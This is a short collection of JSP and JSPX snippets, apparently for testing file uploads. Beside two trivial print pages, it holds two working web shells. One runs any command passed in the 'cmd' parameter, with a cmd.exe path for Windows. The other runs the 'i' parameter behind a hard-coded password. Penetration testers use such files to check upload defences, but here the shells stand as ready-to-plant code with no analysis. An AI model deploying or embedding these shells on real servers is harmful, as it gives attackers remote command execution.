http://www.memozee.com/FILES/097/jinsuk.267.xxx.png
jsp
<!-- print.jsp -->
<%
out.println("Upload Test");
%>
<!-- webshell.jsp -->
<%@ page import="java.util.*,java.io.*"%>
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Insert title here</title>
</head>
<body>
<form method="GET" name="cmdForm" action="">
<input type="text" name="cmd">
<input type="submit" value="입력">
</form>
<pre>
<%
if (request.getParameter("cmd") != null)
{
out.println("명령어 : " + request.getParameter("cmd") + "<br>");
Process p;
if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
else
p = Runtime.getRuntime().exec(request.getParameter("cmd"));
InputStreamReader in = new InputStreamReader(p.getInputStream(),"euc-kr");
BufferedReader br = new BufferedReader(in);
String disr = br.readLine();
while ( disr != null )
{
out.println(disr);
disr = br.readLine();
}
}
%>
</pre>
</body>
</html>
<!-- 출처 : https://github.com/0420syj/cmd.jsp -->
jspx
<!-- print.jspx -->
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.0">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
<jsp:scriptlet>
out.println("Security Test");
</jsp:scriptlet>
</jsp:root>
<!-- webshell.jspx -->
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
<jsp:scriptlet>
if("sin".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
</jsp:scriptlet>
</jsp:root>
